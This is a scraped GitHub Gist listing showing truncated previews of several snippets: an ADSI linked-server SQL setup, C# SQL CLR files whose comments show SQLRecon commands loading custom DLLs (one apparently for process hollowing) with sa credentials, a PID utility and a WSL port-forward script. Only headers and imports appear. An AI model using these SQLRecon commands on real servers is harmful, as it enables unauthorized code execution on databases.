Sanjiv Kawa skahwah
skahwah
/ configure-adsi-link.sql
Last active
June 9, 2023 16:47
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Create a new ADSI linked server, where '@datasrc=' contains the name of the domain controller | |
| EXEC master.dbo.sp_addlinkedserver | |
| @server = N'linkADSI', | |
| @srvproduct=N'Active Directory Service Interfaces', | |
| @provider=N'ADSDSOObject', | |
| @datasrc=N'DC01.KAWALABS.LOCAL'; | |
| # Configure authentication to the ADSI linked server. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\sql.cs | |
| //SQLRecon.exe /auth:local /host:SQL02 /username:sa /password:Password123 /module:clr /dll:c:\temp\sql.dll /function:CustomFunctionName | |
| using System; | |
| using System.Data; | |
| using System.Data.SqlClient; | |
| using System.Data.SqlTypes; | |
| using Microsoft.SqlServer.Server; | |
| using System.Diagnostics; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\hollow.cs | |
| //SQLRecon.exe /auth:local /host:SQL02 /username:sa /password:Password123 /module:clr /dll:c:\temp\hollow.dll /function:BaconTime | |
| using System; | |
| using System.Data; | |
| using System.Data.SqlClient; | |
| using System.Data.SqlTypes; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| using Microsoft.SqlServer.Server; |
skahwah
/ get-pid-and-ppid.cs
Created
January 27, 2021 21:06
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //c:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe get-pid-and-ppid.cs | |
| using System; | |
| using System.ComponentModel; | |
| using System.Collections.Generic; | |
| using System.Linq; | |
| using System.Text; | |
| using System.Runtime.InteropServices; | |
| using Microsoft.Win32.SafeHandles; | |
| using System.IO; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Stick this in your ps profile c:/Users/you/Documents/WindowsPowerShell/profile.ps1 | |
| function wsl-add-port-forward { | |
| param ($param1) | |
| if (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")){ | |
| echo "This function needs to be run as Administrator" | |
| break | |
| } | |
| $remoteport = bash.exe -c "ip -4 addr show eth0 | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | grep -v .255" | |
| $found = $remoteport -match '\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}'; |